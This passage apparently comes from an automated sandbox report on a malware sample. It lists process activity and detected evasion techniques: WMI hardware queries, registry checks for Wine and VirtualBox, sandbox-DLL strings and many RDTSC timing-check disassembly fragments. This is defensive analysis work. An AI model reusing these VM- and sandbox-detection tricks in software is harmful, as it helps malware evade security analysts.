Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4904, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: file300un.exe PID: 7672, type: MEMORYSTR

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\Desktop\bUWKfj04aU.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

graph_0-10100

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\1001107001\jok.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1001107001\jok.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\bUWKfj04aU.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001084001\random.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1001084001\random.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: file300un.exe, 00000027.00000002.3456932485.0000027AB9251000.00000004.00000800.00020000.00000000.sdmp, Uni400uni.exe, 00000028.00000002.3022619723.0000025500041000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: file300un.exe, 00000027.00000002.3456932485.0000027AB9251000.00000004.00000800.00020000.00000000.sdmp, Uni400uni.exe, 00000028.00000002.3022619723.0000025500041000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: Traffic.exe, 0000000F.00000002.2321334601.000000000270D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: A8F87A second address: A8F87E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: A8F87E second address: A8F891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0738B194DDh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: A8F891 second address: A8F8D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738AFBE64h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0738AFBE67h 0x0000000e jmp 00007F0738AFBE61h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AA0657 second address: AA066A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F0738B194DBh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AA066A second address: AA066F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AA066F second address: AA0677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AA08EF second address: AA0908 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c pushad 0x0000000d jmp 00007F0738AFBE5Ah 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AA0A8C second address: AA0A94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AA0A94 second address: AA0A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AA0A9B second address: AA0AAB instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0738B194E2h 0x00000008 jbe 00007F0738B194D6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AA0BFC second address: AA0C00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AA0C00 second address: AA0C0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AA0C0E second address: AA0C46 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0738AFBE56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F0738AFBE66h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F0738AFBE62h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AA0C46 second address: AA0C5A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 je 00007F0738B194E4h 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AA3751 second address: AA3755 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AA3755 second address: AA3793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F0738B194D8h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 mov esi, dword ptr [ebp+122D3875h] 0x0000002c call 00007F0738B194D9h 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AA3793 second address: AA3797 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AA3797 second address: AA379D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AA379D second address: AA37A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AA37A3 second address: AA37D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a jmp 00007F0738B194DDh 0x0000000f pop ebx 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jmp 00007F0738B194E3h 0x00000019 mov eax, dword ptr [eax] 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AA37D9 second address: AA37DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AA37DD second address: AA37E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AA37E1 second address: AA386E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 jnc 00007F0738AFBE60h 0x00000017 pop eax 0x00000018 push 00000000h 0x0000001a push ecx 0x0000001b call 00007F0738AFBE58h 0x00000020 pop ecx 0x00000021 mov dword ptr [esp+04h], ecx 0x00000025 add dword ptr [esp+04h], 00000018h 0x0000002d inc ecx 0x0000002e push ecx 0x0000002f ret 0x00000030 pop ecx 0x00000031 ret 0x00000032 jnc 00007F0738AFBE62h 0x00000038 push 00000003h 0x0000003a sub dword ptr [ebp+122D2C25h], esi 0x00000040 push 00000000h 0x00000042 pushad 0x00000043 and dx, 1700h 0x00000048 mov dword ptr [ebp+122D2ADBh], eax 0x0000004e popad 0x0000004f push 00000003h 0x00000051 movzx ecx, bx 0x00000054 call 00007F0738AFBE59h 0x00000059 push eax 0x0000005a push edx 0x0000005b push edi 0x0000005c jmp 00007F0738AFBE60h 0x00000061 pop edi 0x00000062 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AA386E second address: AA38A6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0738B194EAh 0x00000008 jmp 00007F0738B194E4h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F0738B194E5h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AA38A6 second address: AA38C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738AFBE69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AA39D0 second address: AA3A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jp 00007F0738B194D6h 0x0000000c pop ecx 0x0000000d popad 0x0000000e nop 0x0000000f push edi 0x00000010 mov dword ptr [ebp+122D2B03h], edi 0x00000016 pop edx 0x00000017 push 00000000h 0x00000019 add edx, 6EC11199h 0x0000001f push EF153085h 0x00000024 jmp 00007F0738B194DBh 0x00000029 add dword ptr [esp], 10EACFFBh 0x00000030 mov dword ptr [ebp+122D2D56h], eax 0x00000036 push 00000003h 0x00000038 sub dword ptr [ebp+122D2AD7h], esi 0x0000003e mov esi, ebx 0x00000040 push 00000000h 0x00000042 add dword ptr [ebp+122D29B2h], ebx 0x00000048 push 00000003h 0x0000004a mov edx, dword ptr [ebp+122D2D6Dh] 0x00000050 call 00007F0738B194D9h 0x00000055 jmp 00007F0738B194E0h 0x0000005a push eax 0x0000005b jmp 00007F0738B194DCh 0x00000060 mov eax, dword ptr [esp+04h] 0x00000064 pushad 0x00000065 pushad 0x00000066 jc 00007F0738B194D6h 0x0000006c jmp 00007F0738B194E0h 0x00000071 popad 0x00000072 push ebx 0x00000073 pushad 0x00000074 popad 0x00000075 pop ebx 0x00000076 popad 0x00000077 mov eax, dword ptr [eax] 0x00000079 push eax 0x0000007a push eax 0x0000007b push edx 0x0000007c jng 00007F0738B194D6h 0x00000082 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AA3B2E second address: AA3B46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738AFBE64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AA3B46 second address: AA3C3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0738B194E1h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 movzx ecx, si 0x00000013 push 00000000h 0x00000015 mov dword ptr [ebp+122D2C6Ah], ecx 0x0000001b push 3F7F2421h 0x00000020 jmp 00007F0738B194DDh 0x00000025 xor dword ptr [esp], 3F7F24A1h 0x0000002c call 00007F0738B194E0h 0x00000031 mov esi, 5C752D2Bh 0x00000036 pop ecx 0x00000037 push 00000003h 0x00000039 call 00007F0738B194E7h 0x0000003e mov dword ptr [ebp+12447864h], ebx 0x00000044 pop edi 0x00000045 push 00000000h 0x00000047 mov esi, dword ptr [ebp+122D39D1h] 0x0000004d push 00000003h 0x0000004f jc 00007F0738B194DBh 0x00000055 sub dx, 0F20h 0x0000005a and esi, 630DD230h 0x00000060 call 00007F0738B194D9h 0x00000065 jmp 00007F0738B194E0h 0x0000006a push eax 0x0000006b jmp 00007F0738B194E3h 0x00000070 mov eax, dword ptr [esp+04h] 0x00000074 push eax 0x00000075 jns 00007F0738B194DCh 0x0000007b pop eax 0x0000007c mov eax, dword ptr [eax] 0x0000007e push edi 0x0000007f jnp 00007F0738B194ECh 0x00000085 jmp 00007F0738B194E6h 0x0000008a pop edi 0x0000008b mov dword ptr [esp+04h], eax 0x0000008f pushad 0x00000090 pushad 0x00000091 push eax 0x00000092 push edx 0x00000093 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AA3C3E second address: AA3C56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0738AFBE5Fh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AA3C56 second address: AA3CF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F0738B194D8h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D2BA4h], esi 0x00000028 push edi 0x00000029 movsx edi, bx 0x0000002c pop ecx 0x0000002d lea ebx, dword ptr [ebp+1244B697h] 0x00000033 push 00000000h 0x00000035 push edi 0x00000036 call 00007F0738B194D8h 0x0000003b pop edi 0x0000003c mov dword ptr [esp+04h], edi 0x00000040 add dword ptr [esp+04h], 0000001Bh 0x00000048 inc edi 0x00000049 push edi 0x0000004a ret 0x0000004b pop edi 0x0000004c ret 0x0000004d adc cx, DEA1h 0x00000052 jg 00007F0738B194DCh 0x00000058 mov dword ptr [ebp+122D2A96h], ecx 0x0000005e xchg eax, ebx 0x0000005f je 00007F0738B194E4h 0x00000065 push edi 0x00000066 jmp 00007F0738B194DCh 0x0000006b pop edi 0x0000006c push eax 0x0000006d jl 00007F0738B194E2h 0x00000073 js 00007F0738B194DCh 0x00000079 push eax 0x0000007a push edx 0x0000007b rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AC4175 second address: AC4182 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AC4182 second address: AC418A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AC418A second address: AC418F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AC21F4 second address: AC2201 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jc 00007F0738B194D6h 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AC2308 second address: AC230E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AC230E second address: AC2312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
